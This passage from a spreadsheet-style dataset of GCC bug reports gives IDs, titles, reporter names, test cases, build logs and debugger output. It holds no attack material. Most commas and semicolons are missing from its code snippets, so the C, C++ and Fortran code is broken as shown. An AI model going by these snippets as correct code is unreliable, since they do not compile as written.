gcc version 4.5.2 (Ubuntu/Linaro 4.5.2-8ubuntu4) 
(4.4.5 works fine)</t>
  </si>
  <si>
    <t>qball</t>
  </si>
  <si>
    <t>GCC-10426</t>
  </si>
  <si>
    <t>-O2 messes with ordering of pointer dereferencing</t>
  </si>
  <si>
    <t>Expected o/p : abcde but with -O2 get bcde:
int main( int argc char ** argv )
{
  char str[17]
  sprintf( str ABCDE )
  char * p = str
  for( *p  )
    *p++ = tolower(*p)
  printf( '%s'\n str )
  return 0
}
Yes it's nasty coding no *I* didn't write it in its wild form :)
[.i file redundant]
Release:
3.2.2 (don't know when from but after 2.96 which works fine)
Environment:
Linux 2.4.20
gcc 3.2.2
How-To-Repeat:
Works:
  gcc     -o test test.c
Doesn't:
  gcc -O2 -o test test.c</t>
  </si>
  <si>
    <t>jonathan.sambrook</t>
  </si>
  <si>
    <t>GCC-8973</t>
  </si>
  <si>
    <t>[arc-7-elf] the interupt handler does not return properly uses j.d insted of j.d.f</t>
  </si>
  <si>
    <t>inteupt handler code:
void ivic3_handler (void) __attribute__ ((__interrupt__ (ilink1)))
void ivic3_handler (void)
{
}
produce the asn code:
    .cpu base
    .section .text
    .align 4
    .global _ivic3_handler
    .type   _ivic3_handler@function
_ivic3_handler:
     interrupt handler
    sub spsp16
     BEGIN PROLOGUE  vars= 0 regs= 0 args= 0 extra= 0
    st fp[sp]
    mov fpsp
     END PROLOGUE
     EPILOGUE
    ld.a fp[sp0]
    j.d ilink1
    add spsp16
.Lfe1:
    .size   _ivic3_handler.Lfe1-_ivic3_handler
    .ident  GCC: (GNU) 3.2
the return statement:
    j.d ilink1
should be
    j.d.f (to update the flags)
Release:
gcc version 3.2
Environment:
Configured with: ./configure --prefix=/afs/iil/home/o/oporan/fw/gcc/gcc-3.2/../install/ --target=arc-7-elf.
Linux
gcc as cross-compiler</t>
  </si>
  <si>
    <t>saurabh.verma</t>
  </si>
  <si>
    <t>or.poran</t>
  </si>
  <si>
    <t>GCC-34648</t>
  </si>
  <si>
    <t>[4.3 Regression] ICE in find_or_generate_expression</t>
  </si>
  <si>
    <t>The following testcase distilled from tinyfugue-5.0 ICEs with
internal compiler error: in find_or_generate_expression at tree-ssa-pre.c:2255
/* { dg-do compile } */
/* { dg-options -O2 -fexceptions } */
extern const unsigned short int **bar (void) __attribute__ ((const))
const char *a
int b
char c
char
foo (int *x)
{
  char r
  c = '\0'
  if (!b)
    {
      while (((*bar ())[a[*x]] &amp; 0x2000) != 0)
        (*x)++
      if (a[++(*x)] == '-')
        {
          (*x)++
          if (a[*x] &amp;&amp; !((*bar ())[a[*x]] &amp; 0x2000))
            return '?'
        }
      if (!a[*x] || ((*bar ())[a[*x]] &amp; 0x2000))
        {
          while (((*bar ())[a[*x]] &amp; 0x2000))
            ++(*x)
          return '\0'
        }
    }
  r = a[*x]
  b = a[*x] 
  return r
}</t>
  </si>
  <si>
    <t>GCC-20538</t>
  </si>
  <si>
    <t>compiling -finline-functions -O2 and we crash at runtime</t>
  </si>
  <si>
    <t>From:
program nbody
  implicit none
  integer result num i k
  character(len=8) argv
  real*8 parameter :: tstep = 0.01d0
  real*8 parameter ::  PI = 3.141592653589793d0
  real*8 parameter ::  SOLAR_MASS = 4 * PI * PI
  real*8 parameter ::  DAYS_PER_YEAR = 365.24d0
  real*8 :: e
  type body
     real*8 x y z vx vy vz mass
  end type body
  type(body) parameter :: jupiter = body( &amp;
       4.84143144246472090d0    -1.16032004402742839d0 &amp;
       -1.03622044471123109d-01 1.66007664274403694d-03 * DAYS_PER_YEAR &amp;
       7.69901118419740425d-03 * DAYS_PER_YEAR -6.90460016972063023d-05 * DAYS_PER_YEAR 
&amp;
       9.54791938424326609d-04 * SOLAR_MASS)
  type(body) parameter :: saturn = body( &amp;
       8.34336671824457987d+00 &amp;
       4.12479856412430479d+00 &amp;
       -4.03523417114321381d-01 &amp;
       -2.76742510726862411d-03 * DAYS_PER_YEAR &amp;
       4.99852801234917238d-03 * DAYS_PER_YEAR &amp;
       2.30417297573763929d-05 * DAYS_PER_YEAR &amp;
       2.85885980666130812d-04 * SOLAR_MASS)
  type(body) parameter :: uranus = body( &amp;
           1.28943695621391310d+01 &amp;
           -1.51111514016986312d+01 &amp;
           -2.23307578892655734d-01 &amp;
           2.96460137564761618d-03 * DAYS_PER_YEAR &amp;
           2.37847173959480950d-03 * DAYS_PER_YEAR &amp;
           -2.96589568540237556d-05 * DAYS_PER_YEAR &amp;
           4.36624404335156298d-05 * SOLAR_MASS )
  type(body) parameter :: neptune = body( &amp;
       1.53796971148509165d+01 &amp;
       -2.59193146099879641d+01 &amp;
       1.79258772950371181d-01 &amp;
       2.68067772490389322d-03 * DAYS_PER_YEAR &amp;
       1.62824170038242295d-03 * DAYS_PER_YEAR &amp;
       -9.51592254519715870d-05 * DAYS_PER_YEAR &amp;
       5.15138902046611451d-05 * SOLAR_MASS)
  type(body) parameter :: sun = body(0.0d0 0.0d0 0.0d0 0.0d0 0.0d0 0.0d0 SOLAR_MASS)
  type(body) dimension(5) :: bodies
  bodies = (/ sun jupiter saturn uranus neptune /)
  call getarg(1argv)
  read(argv*) num
  call offsetMomentum(1bodies)
  e = energy(bodies)
  write(*'(f12.9)') e
  do i=1num
     call advance(tstep bodies)
  end do
  e = energy(bodies)
  write(*'(f12.9)') e
contains
  subroutine offsetMomentum(k bodies)
    integer intent(in) :: k
    type(body) dimension(:) intent(inout) :: bodies
    real*8 :: px py pz
    px = 0.0d0
    py = 0.0d0
    pz = 0.0d0
    do i=1size(bodies)
       px = px + bodies(i)%vx * bodies(i)%mass
       py = py + bodies(i)%vy * bodies(i)%mass
       pz = pz + bodies(i)%vz * bodies(i)%mass
    end do
    bodies(k)%vx = -px/SOLAR_MASS
    bodies(k)%vy = -py/SOLAR_MASS
    bodies(k)%vz = -pz/SOLAR_MASS
  end subroutine offsetMomentum
  subroutine advance(tstep bodies)
  real*8 intent(in) :: tstep
  type(body) dimension(:) intent(inout) :: bodies
  real*8 dx dy dz distance mag
  integer i j
  do i=1size(bodies)
     do j=i+1size(bodies)
        dx = bodies(i)%x - bodies(j)%x
        dy = bodies(i)%y - bodies(j)%y
        dz = bodies(i)%z - bodies(j)%z
        distance = sqrt(dx*dx + dy*dy + dz*dz)
        mag = tstep / (distance * distance * distance)
        bodies(i)%vx = bodies(i)%vx - dx * bodies(j)%mass * mag
        bodies(i)%vy =  bodies(i)%vy - dy * bodies(j)%mass * mag
        bodies(i)%vz =  bodies(i)%vz - dz * bodies(j)%mass * mag
        bodies(j)%vx = bodies(j)%vx + dx * bodies(i)%mass * mag
        bodies(j)%vy = bodies(j)%vy + dy * bodies(i)%mass * mag
        bodies(j)%vz = bodies(j)%vz + dz * bodies(i)%mass * mag
     end do
  end do
  do i=1size(bodies)
     bodies(i)%x = bodies(i)%x + tstep * bodies(i)%vx
     bodies(i)%y = bodies(i)%y + tstep * bodies(i)%vy
     bodies(i)%z = bodies(i)%z + tstep * bodies(i)%vz
  end do
  end subroutine advance
  real*8 function energy(bodies)
    type(body) dimension(:) intent(in) :: bodies
    real*8 dx dy dz distance
    integer i j
    energy = 0.0d0
    do i=1size(bodies)
       energy = energy + 0.5d0 * bodies(i)%mass *  &amp;
            ( bodies(i)%vx * bodies(i)%vx + &amp;
            bodies(i)%vy * bodies(i)%vy + &amp;
            bodies(i)%vz * bodies(i)%vz)
       do j=i+1size(bodies)
          dx = bodies(i)%x - bodies(j)%x
          dy = bodies(i)%y - bodies(j)%y
          dz = bodies(i)%z - bodies(j)%z
          distance = sqrt(dx*dx + dy*dy + dz*dz)
          energy = energy - (bodies(i)%mass * bodies(j)%mass) / distance
       end do
    end do
  end function energy
end program nbody
I don't know where the problem is which is why I am just filing it.
run with 600000 as the agrument to the problem.  If someone will reduce this for me it would be nice.</t>
  </si>
  <si>
    <t>GCC-53477</t>
  </si>
  <si>
    <t>pretty printer fails with: Python Exception  list index out of range</t>
  </si>
  <si>
    <t>Created attachment 27490
testcase
$ x86_64-gnu-linux-g++ t.cpp -Wall -o t -g2 -gdwarf-4
$ cgdb ./t
in line 15 pretty printer fails with error.
 7â”‚ int main()
 8â”‚ {
 9â”‚         icapSelection_[ /* frame */ 7 ][ /* word */ 3 ].insert( 5 )
10â”‚         icapSelection_[ /* frame */ 7 ][ /* word */ 3 ].insert( 1 )
11â”‚         for ( IcapSelection::const_iterator i = icapSelection_.begin() i != icapSelection_.end() ++i )
12â”‚         {
13â”‚                 IcapSelection::key_type frame( i-&gt;first )
14â”‚                 IcapSelection::mapped_type const
15â”œâ”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€&gt; for ( IcapSelection::mapped_type::const_iterator j = wordBitsetMap.begin() j != wordBitsetMap.end() ++j )
16â”‚                 {
17â”‚                         IcapSelection::mapped_type::key_type word( j-&gt;first )
18â”‚                         IcapSelection::mapped_type::mapped_type const
19â”‚                         for ( IcapSelection::mapped_type::mapped_type::const_iterator k = bits.begin() k != bits.end() ++k )
20â”‚                         {
21â”‚                                 unsigned bit( *k )
22â”‚                         }
23â”‚                 }
24â”‚         }
25â”‚ }
/home/users/pawels/dvm.git/t.cpp
Breakpoint 1 main () at t.cpp:9
(gdb) n
(gdb)
(gdb) p icapSelection_
$1 = std::map with 1 elements = {
  [7] = std::map with 1 elements = {
    [3] = std::set with 2 elements = {
      [0] = 1
      [1] = 5
    }
  }
}
(gdb) n
(gdb)
(gdb)
(gdb) p wordBitsetMap
$2 = Python Exception  list index out of range:
std::map with 1 elements</t>
  </si>
  <si>
    <t>GCC-31429</t>
  </si>
  <si>
    <t>[4.3 Regression] __builtin_setjmp/__builtin_longjmp is broken on ppc-darwin</t>
  </si>
  <si>
    <t>GCC-3366</t>
  </si>
  <si>
    <t>i960-elf fails to compile on gcc 3.0 CVS branch</t>
  </si>
  <si>
    <t>../gcc/configure --target=i960-elf --with-gnu-as --with-gnu-ld --with-newlib --verbose --prefix=/usr1/tmp-tools --enable-languages=cc++ &amp;&amp; make
fails with this error:
  -nostartfiles -nostdlib `/usr3/ftp_archive/gnu/gcc/ss/b3/b-i960-elf/gcc/xgcc -B/usr3/ftp_archive/gnu/gcc/ss/b3/b-i960-elf/gcc/ -nostdinc -B/usr3/ftp_archive/gnu/gcc/ss/b3/b-i960-elf/i960-elf/newlib/ -isystem /usr3/ftp_archive/gnu/gcc/ss/b3/b-i960-elf/i960-elf/newlib/targ-include -isystem /usr3/ftp_archive/gnu/gcc/ss/b3/gcc/newlib/libc/include -B/usr1/tmp-tools/i960-elf/bin/ -B/usr1/tmp-tools/i960-elf/lib/ -isystem /usr1/tmp-tools/i960-elf/include --print-libgcc-file-name`
libgcc1-test.o: In function `_main_without__main':
libgcc1-test.o(.text+0x4c): undefined reference to `___truncdfsf2'
libgcc1-test.o(.text+0x68): undefined reference to `___truncdfsf2'
libgcc1-test.o(.text+0x178): undefined reference to `___adddf3'
libgcc1-test.o(.text+0x194): undefined reference to `___subdf3'
libgcc1-test.o(.text+0x1b0): undefined reference to `___muldf3'
libgcc1-test.o(.text+0x1cc): undefined reference to `___divdf3'
libgcc1-test.o(.text+0x1fc): undefined reference to `___addsf3'
libgcc1-test.o(.text+0x208): undefined reference to `___extendsfdf2'
libgcc1-test.o(.text+0x224): undefined reference to `___subsf3'
libgcc1-test.o(.text+0x230): undefined reference to `___extendsfdf2'
libgcc1-test.o(.text+0x24c): undefined reference to `___mulsf3'
libgcc1-test.o(.text+0x258): undefined reference to `___extendsfdf2'
libgcc1-test.o(.text+0x274): undefined reference to `___divsf3'
libgcc1-test.o(.text+0x280): undefined reference to `___extendsfdf2'
libgcc1-test.o(.text+0x2a0): undefined reference to `___extendsfdf2'
libgcc1-test.o(.text+0x2b8): undefined reference to `_(float int long long double float short int)'
libgcc1-test.o(.text+0x2d0): undefined reference to `_(float int long long short float short int)'
etc...
Release:
gcc 3.0 CVS branch
Environment:
GNU/Linux RedHat 6.2 targetting i960-elf
How-To-Repeat:
configure and build per description.
I used binutils 2.10 and newlib 1.9.0</t>
  </si>
  <si>
    <t>GCC-24478</t>
  </si>
  <si>
    <t>gcc.dg/weak/weak-14.c (test for excess errors) fails</t>
  </si>
  <si>
    <t>FAIL: gcc.dg/weak/weak-14.c (test for excess errors)
has appeared on mainline on 20051021 on hppa2.0w-hp-hpux11.11.  This is a new test.
/scratch/gcc/nightly-2005-10-21-mainline/src/gcc-mainline/gcc/testsuite/gcc.dg/weak/weak-14.c:20: error: alias definitions not supported in this configuration
/scratch/gcc/nightly-2005-10-21-mainline/src/gcc-mainline/gcc/testsuite/gcc.dg/weak/weak-14.c:24: error: alias definitions not supported in this configuration</t>
  </si>
  <si>
    <t>GCC-43166</t>
  </si>
  <si>
    <t>[4.5 Regression] ICE in simplify_subreg on fortran code</t>
  </si>
  <si>
    <t>C { dg-do compile }
C { dg-options -O -g }
      SUBROUTINE FOO ()
      INTEGER V1
      COMMON // V1
      END
      SUBROUTINE BAR ()
      INTEGER V0V1V2V3
      COMMON // V1(4)V2(854)V3
      DO V3=1V1(1)
      V0=V2(V31)
      END DO
      END
ICEs in simplify_subreg called from expand_debug_expr.  Seems this is Fortran FE's fault but I think we should both fix up Fortran FE and make expand_debug_expr more robust.</t>
  </si>
  <si>
    <t>GCC-9260</t>
  </si>
  <si>
    <t>gcc compiler failed to compile legal code (partial specialization of template members of templates)</t>
  </si>
  <si>
    <t>The gcc failed to compile the file below:
(preprocessed file t.ii)
# 1 t.cpp
class v0 {}
class v1 {}
template
        class A
{
public:
        typedef int m_type
        template class B {}
        void f()
}
template
        template
                class A::B
{
public:
        typedef typename A::m_type m_type
}
template
        void A::f()
{
}
template
        template
                class A::B
{
public:
        typedef typename A::m_type m_type
}
The error message is:
gcc -c t.cpp --save-temps
t.cpp:6: `class A' is inaccessible
t.cpp:33: within this context
///////////////////////////////
I have 2 partial specializations of template class B ( member of A )
and it seems that compilation fails whenever I try to put any
specialization of template class B after 
the definition of class A's member function f():
template
        void A::f()
{
}
Release:
gcc-3.0.3
Environment:
SunOS 5.8 sun4u sparc SUNWUltra-5_10
How-To-Repeat:
gcc -c t.cpp</t>
  </si>
  <si>
    <t>konobeev_vladimir</t>
  </si>
  <si>
    <t>GCC-40385</t>
  </si>
  <si>
    <t>new testcases bought in by Revision 148285 fail on ia64</t>
  </si>
  <si>
    <t>On Linux/ia64 revision 148285:
http://gcc.gnu.org/ml/gcc-cvs/2009-06/msg00265.html
caused:
FAIL: libffi.call/cls_longdouble_va.c -O0 -W -Wall output pattern test is %.1f
FAIL: libffi.call/cls_longdouble_va.c -O2 -fomit-frame-pointer output pattern test is %.1f
FAIL: libffi.call/cls_longdouble_va.c -O2 output pattern test is %.1f
FAIL: libffi.call/cls_longdouble_va.c -O3 output pattern test is %.1f
FAIL: libffi.call/cls_longdouble_va.c -Os output pattern test is %.1f
FAIL: libffi.call/err_bad_abi.c -O0 -W -Wall execution test
FAIL: libffi.call/err_bad_abi.c -O2 -fomit-frame-pointer execution test
FAIL: libffi.call/err_bad_abi.c -O2 execution test
FAIL: libffi.call/err_bad_abi.c -O3 execution test
FAIL: libffi.call/err_bad_abi.c -Os execution test
FAIL: libffi.call/err_bad_typedef.c -O0 -W -Wall execution test
FAIL: libffi.call/err_bad_typedef.c -O2 -fomit-frame-pointer execution test
FAIL: libffi.call/err_bad_typedef.c -O2 execution test
FAIL: libffi.call/err_bad_typedef.c -O3 execution test
FAIL: libffi.call/err_bad_typedef.c -Os execution test</t>
  </si>
  <si>
    <t>GCC-3533</t>
  </si>
  <si>
    <t>g++ seg faults on IRIX at enum in member function</t>
  </si>
  <si>
    <t>Building OpenOffice using gcc 3.0 results in a core dump on line 1432 which is an enum dangling within a member function.
I tried to build the .ii.gz files as instructed however the resulting file was shortened way before the problem.
So I have attached the file in question ... which could otherwise be found at:
http://www.openoffice.org/source/browse/util/tools/source/fsys/urlobj.cxx?rev=1.15&amp;content-type=text/x-cvsweb-markup
Workaround: move enum to top of member function
This is the OpenOffice bug involved:
http://www.openoffice.org/issues/show_bug.cgi?id=1156
And here is the patch I applied to the file I have attached.
http://www.openoffice.org/issues/showattachment.cgi?attach_id=332
Release:
gcc version 3.0 Thread model: single
Environment:
mips-sgi-irix6.5
% hinv
4 250 MHZ IP27 Processors
CPU: MIPS R10000 Processor Chip Revision: 3.4
FPU: MIPS R10010 Floating Point Chip Revision: 3.4
Main memory size: 1024 Mbytes
Instruction cache size: 32 Kbytes
Data cache size: 32 Kbytes</t>
  </si>
  <si>
    <t>GCC-29886</t>
  </si>
  <si>
    <t>[4.0 regression] Cast misinterpreted as variable declaration</t>
  </si>
  <si>
    <t>The following IMHO valid code snippet is rejected since GCC 4.0.0:
============================
struct A
{
  static int x[1]
}
void foo(int i)
{
  if (int(A::x[i])) {}
}
============================
bug.cc: In function 'void foo(int)':
bug.cc:8: error: array bound is not an integer constant</t>
  </si>
  <si>
    <t>GCC-7713</t>
  </si>
  <si>
    <t>Performance regression from gcc 2.95.3</t>
  </si>
  <si>
    <t>Running C benchmark found here:
http://www.cwi.nl/~tromp/c4/fhour.html
I was looking at runtimes from different compilers gcc 2.95.4 (.3 plus Debian patches) and released gcc 3.2 included.
If I compile with gcc 2.95 -O2 I get the following performance numbers from the program:
207.2 Kpos/sec 208.7 Kpos/sec
gcc 2.95 -O2 -mcpu=604e
214.5 Kpos/sec 215.2 Kpos/sec
gcc 3.2 -O2
197.9 201.2
gcc 3.2 -O2 -mcpu=604e
199.4 201.1 198.7
I've played with some other settings and have been unable to  get 3.2 to match or beat 2.95's performance here.
Note using the 3.3 mainline of about July 23 I got about equivalent runtime performance on the same benchmark.
Release:
gcc-3.2
Environment:
powerpc-unknown-linux-gnu
glibc 2.2.5
binutils 2.12.90.0.9
Debian Woody
240MHz 604e
1MB cache
How-To-Repeat:
Build with the same compile-time flags.
Run as:
c4 &lt; input</t>
  </si>
  <si>
    <t>GCC-29131</t>
  </si>
  <si>
    <t>[DR 225] Bad name lookup for templates due to fundamental types namespace for ADL.</t>
  </si>
  <si>
    <t>The following C++ code should not compile:
template
int t(T i)
{
  return f (i)  // error: f not visible here
}
int
f (int i)
{
  return i
}
int
main()
{
  return t(1)
}
The C++ standard clause 14.6.3 states that names should be looked up from the
point they are used. I.e. functions defined after that point are not visible.
This is true for regular functions but GCC does not get this right for
template functions.</t>
  </si>
  <si>
    <t>GCC-26906</t>
  </si>
  <si>
    <t>internal compiler error: in do_SUBST at combine.c:447</t>
  </si>
  <si>
    <t>ICE when cross-compiling on x86_64 host for armeb target.
Included the command that makes GCC fail (minus all -I include paths) with an ICE the output. I will attach the preprocessed C file in a direct follow-up.
See also existing bug 23442 on a different platform.
armeb-linux-gcc -march=armv5te -mtune=xscale -mthumb-interwork -mno-thumb -DHAVE_CONFIG_H -DG_LOG_DOMAIN=\Gtk\ -DGTK_LIBDIR=\/usr/lib\ -DGTK_DATADIR=\/usr/share\ -DGTK_DATA_PREFIX=\/usr\ -DGTK_SYSCONFDIR=\/etc\ -DGTK_VERSION=\2.8.9\ -DGTK_BINARY_VERSION=\2.4.0\ -DGTK_HOST=\armeb-unknown-linux-gnu\ -DGTK_COMPILATION -DG_DISABLE_DEPRECATED -DGDK_PIXBUF_DISABLE_DEPRECATED -DGDK_DISABLE_DEPRECATED -DGTK_DISABLE_DEPRECATED -DGTK_FILE_SYSTEM_ENABLE_UNSUPPORTED -DG_DISABLE_CAST_CHECKS -pthread -Os -fomit-frame-pointer -frename-registers -fno-unroll-loops -fno-inline-functions -fweb -funit-at-a-time -Wall -c gtktooltips.i  -fPIC -DPIC -o gtktooltips.o
gtktooltips.c: In function `gtk_tooltips_init':
gtktooltips.c:127: internal compiler error: in do_SUBST at combine.c:447</t>
  </si>
  <si>
    <t>likewise</t>
  </si>
  <si>
    <t>GCC-48320</t>
  </si>
  <si>
    <t>[C++0x][4.6/4.7 Regression] Template parameter packs cannot be expanded in default template arguments</t>
  </si>
  <si>
    <t>Source File (bug.cc):
#include 
#include 
#include 
template
struct indices {}
template&lt; class Tuple std::size_t... Indices
  class Result = std::tuple&lt;
    typename std::tuple_element&lt;
      Indices typename std::decay::type
    &gt;::type...
  &gt;
&gt;
Result f( Tuple &amp;&amp; t indices )
{
  return Result(
    std::forward::type&gt;(
      std::get(t)
    )...
  )
}
#include 
int main()
{
  auto t = f( std::make_tuple( 1 2 3 ) indices() )
  assert( std::get(t) == 3 )
  assert( std::get(t) == 2 )
  assert( std::get(t) == 1 )
}
Message:
compiling and running file 'bug.cc'...
bug.cc: In function â€˜int main()â€™:
bug.cc:28:62: error: no matching function for call to â€˜f(std::tuple indices)â€™
bug.cc:28:62: note: candidate is:
bug.cc:15:43: note: template Result f(Tuple&amp;&amp; indices)
bug.cc:28:62: error: unable to deduce â€˜autoâ€™ from â€˜â€™
Note:
#include 
#include 
#include 
template
struct indices {}
template
std::tuple&lt;
  typename std::tuple_element&lt;
    Indices typename std::decay::type
  &gt;::type...
&gt;
f( Tuple &amp;&amp; t indices )
{
  typedef std::tuple&lt;
    typename std::tuple_element&lt;
      Indices typename std::decay::type
    &gt;::type...
  &gt; Result
  return Result(
    std::forward::type&gt;(
      std::get(t)
    )...
  )
}
#include 
int main()
{
  auto t = f( std::make_tuple( 1 2 3 ) indices() )
  assert( std::get(t) == 3 )
  assert( std::get(t) == 2 )
  assert( std::get(t) == 1 )
}
is OK.</t>
  </si>
  <si>
    <t>GCC-39984</t>
  </si>
  <si>
    <t>ggc-pr37574.c gets ICE in tree_node_structure</t>
  </si>
  <si>
    <t>Test gcc.dg/vect/ggc-pr37574.c started failing on powerpc64-linux with -m32 or -m64 with this patch:
    http://gcc.gnu.org/viewcvs?view=rev&amp;rev=146888
    r146888 | rguenth | 2009-04-28 12:16:22 +0000 (Tue 28 Apr 2009)
with the following options to cc1 which are used in the testsuite:
  -D__linux__ -Dunix -D__unix -Dlinux -D__linux -O2 -maltivec -ftree-vectorize --param ggc-min-expand=0 --param ggc-min-heapsize=0</t>
  </si>
  <si>
    <t>GCC-41502</t>
  </si>
  <si>
    <t>ICE in expand_call_inline</t>
  </si>
  <si>
    <t>gcc.dg/attr-warn-unused-result.c ICEs in
Program received signal SIGSEGV Segmentation fault.
0x0000000000c790bc in expand_call_inline (bb=0x7ffff71a0a10 
    stmt=0x7ffff7198000 id=0x7fffffffd810)
    at /space/rguenther/src/svn/lto/gcc/tree-inline.c:3661
3661      gcc_assert (!id-&gt;src_cfun-&gt;after_inlining)
(gdb) p cfun
$1 = (struct function *) 0x7ffff7128140
(gdb) p id-&gt;src_cfun
$1 = (struct function *) 0x0</t>
  </si>
  <si>
    <t>GCC-51552</t>
  </si>
  <si>
    <t>bfin generates bad assembly</t>
  </si>
  <si>
    <t>Created attachment 26085
Preprocessed test case
xgcc (GCC) 4.7.0 20111214 (experimental) [trunk revision 182330]
Target: bfin-rtems4.11 compiling newlib
/home2/joel/build/b-bfin-gcc/./gcc/xgcc -B/home2/joel/build/b-bfin-gcc/./gcc/ -nostdinc -B/home2/joel/build/b-bfin-gcc/bfin-rtems4.11/newlib/ -isystem /home2/joel/build/b-bfin-gcc/bfin-rtems4.11/newlib/targ-include -isystem /users/joel/test-gcc/gcc-svn/newlib/libc/include -B/users/joel/test-gcc/install-svn/bfin-rtems4.11/bin/ -B/users/joel/test-gcc/install-svn/bfin-rtems4.11/lib/ -isystem /users/joel/test-gcc/install-svn/bfin-rtems4.11/include -isystem /users/joel/test-gcc/install-svn/bfin-rtems4.11/sys-include    -DPACKAGE_NAME=\newlib\ -DPACKAGE_TARNAME=\newlib\ -DPACKAGE_VERSION=\1.19.0\ -DPACKAGE_STRING=\newlib\ 1.19.0\ -DPACKAGE_BUGREPORT=\\ -DPACKAGE_URL=\\ -I. -I/users/joel/test-gcc/gcc-svn/newlib/libc/string -D_COMPILING_NEWLIB -DMALLOC_PROVIDED -DEXIT_PROVIDED -DSIGNAL_PROVIDED -DREENTRANT_SYSCALLS_PROVIDED -DHAVE_NANOSLEEP -DHAVE_BLKSIZE -DHAVE_FCNTL -DHAVE_ASSERT_FUNC -D_NO_GETLOGIN -D_NO_GETPWENT -D_NO_GETUT -D_NO_GETPASS -D_NO_SIGSET -D_NO_WORDEXP -D_NO_POPEN -Wall -fno-builtin      -g -O2 -c -o lib_a-strsignal.o `test -f 'strsignal.c' || echo '/users/joel/test-gcc/gcc-svn/newlib/libc/string/'`strsignal.c
/tmp/cctEZ5VY.s: Assembler messages:
/tmp/cctEZ5VY.s:24: Error: syntax error. Input text was .LCFI1.
/tmp/cctEZ5VY.s:24: Error: 
Cutting this down it appears to be the -g flag:
[joel@rtbf64a string]$ /home2/joel/build/b-bfin-gcc/./gcc/xgcc -B/home2/joel/build/b-bfin-gcc/./gcc/ -O2 -c -fno-builtin j.c
[joel@rtbf64a string]$ /home2/joel/build/b-bfin-gcc/./gcc/xgcc -B/home2/joel/build/b-bfin-gcc/./gcc/ -O2 -c -g -fno-builtin j.c
/tmp/ccwaXpNe.s: Assembler messages:
/tmp/ccwaXpNe.s:24: Error: syntax error. Input text was .LCFI1.
/tmp/ccwaXpNe.s:24: Error: 
The bad asm generated is here:
.LCFI0:
        R2 = ROT R0 BY 0 ||
.LCFI1:
        R7 = [P2] ||
        nop
I am guessing there should have been a semi-colon and maybe a nop before .LCFI1.</t>
  </si>
  <si>
    <t>GCC-41336</t>
  </si>
  <si>
    <t>[LTO] Bootstrap failed on RHEL5/ia32 and RHEL5/ia64</t>
  </si>
  <si>
    <t>+++ This bug was initially created as a clone of Bug #38992 +++
On RHEL5/ia32 and RHEL5/ia64 revision 151545 gave
cc1: warnings being treated as errors
../../src-lto/gcc/lto/lto-elf.c: In function 'validate_file':
../../src-lto/gcc/lto/lto-elf.c:453:3: error: implicit declaration of function 'elf_getshdrstrndx'
make[6]: *** [lto/lto-elf.o] Error 1</t>
  </si>
  <si>
    <t>GCC-70228</t>
  </si>
  <si>
    <t>insufficient detail in diagnostics for a constexpr out of bounds array subscript</t>
  </si>
  <si>
    <t>Diagnostics issued for out of bounds array references in non-trivial constexpr don't provide sufficient detail to quickly root cause the problem.  For example the diagnostic printed for the program below makes determining the value that exceeded the bounds of the array and what those bounds are more difficult than it should be.  Since the index value and the bounds are known at translation time they both should be mentioned in the text of the diagnostic.
$ cat v.c &amp;&amp; /home/msebor/build/gcc-trunk-git/gcc/xgcc -B/home/msebor/build/gcc-trunk-git/gcc -S -Wall -Wextra -Wpedantic -o/dev/null -xc++ v.c
constexpr int a[] = { 1 2 3 }
constexpr int f (int i)
{
    int j = i + 1
    return a[j]
}
constexpr int g (int i)
{
    int j = i + 1
    return f (j)
}
constexpr int i = g (0)
constexpr int x = g (i)
v.c:16:21:   in constexpr expansion of â€˜g(3)â€™
v.c:12:14:   in constexpr expansion of â€˜f(j)â€™
v.c:16:23: error: array subscript out of bound
 constexpr int x = g (i)
                       ^
For an example of what a more helpful diagnostic might look like consider the output printed by Clang for the same program:
v.c:16:15: error: constexpr variable 'x' must be initialized by a constant
      expression
constexpr int x = g (i)
              ^   ~~~~~
v.c:6:12: note: cannot refer to element 5 of array of 3 elements in a constant
      expression
    return a[j]
           ^
v.c:12:12: note: in call to 'f(4)'
    return f (j)
           ^
v.c:16:19: note: in call to 'g(3)'
constexpr int x = g (i)
                  ^
1 error generated.</t>
  </si>
  <si>
    <t>GCC-42372</t>
  </si>
  <si>
    <t>[4.5 Regression] Regrename reuses non-dead register</t>
  </si>
  <si>
    <t>attached testcase fails on trunk for arm target with the following optset
-c -fgnu89-inline -Os -frename-registers
it works ok with -O2 or -O3
/tmp/cc9PcQw8.s: Assembler messages:
/tmp/cc9PcQw8.s:438: Error: undefined symbol `.LPIC7' in operation</t>
  </si>
  <si>
    <t>GCC-5794</t>
  </si>
  <si>
    <t>gcj fails to verify .class file generated by Sun JDK 1.4 compiler</t>
  </si>
  <si>
    <t>If I use Sun's Java compiler (from JDK 1.4) to compile a .java file containing a try...finally block then try to use gcj to compile the .class file into executable code gcj complains with the error message bad pc in exception_table.
Here's what's going on.  Recall that a Java .class file contains an exception table for each method.  Each entry in the exception table contains a range (from to) of instructions to protect as well as a target instruction to jump to if an exception occurs within that range.  When Sun's Java compiler in JDK 1.4 compiles a try...finally block it emits a (useless and unused) exception table entry whose target is within the range of protected instructions.  There is nothing inherently unsafe with this but we check for this case and reject it in verify.c.
Unfortunately the fix is apparently not as simple as removing the line which makes this check (the line || (handler_pc &gt;= start_pc  I tried that and then gcj complained about a stack overflow in the same .class file.  I don't have time to look at the verification code more right now so I'm filing a bug report in case someone else wants to pick up where I left off.
Release:
gcc version 3.0.2 20010905 (Red Hat Linux 7.1 3.0.1-3)
Environment:
Red Hat Linux 7.2 on a Pentium PC
How-To-Repeat:
$ /usr/java/j2sdk1.4.0/bin/javac Foo.java
$ gcj Foo.class
Foo.java: In class `Foo':
Foo.java: In method `Foo.invoke()':
Foo.java:6: bad pc in exception_table
$</t>
  </si>
  <si>
    <t>GCC-9573</t>
  </si>
  <si>
    <t>typedef with __attribute__ ((mode(....))) doesnt seem to work inside a struct/class</t>
  </si>
  <si>
    <t>Compiling this code: (g++ -msse)
struct v8qi {
	typedef int T __attribute__ ((mode(V8QI)))
	v8qi() {
		long long int tmp
		__builtin_ia32_punpckhbw((T) tmp (T) tmp)
	}
}
does NOT work.  The error is:
test16.cpp:5: error: cannot convert `int' to `vector signed char' for argument
   `1' to `vector signed char __builtin_ia32_punpckhbw(vector signed char
   vector signed char)'
But when you move the typedef out of the struct you get this:
typedef int T __attribute__ ((mode(V8QI)))
struct v8qi {
	v8qi() {
		long long int tmp
		__builtin_ia32_punpckhbw((T) tmp (T) tmp)
	}
}
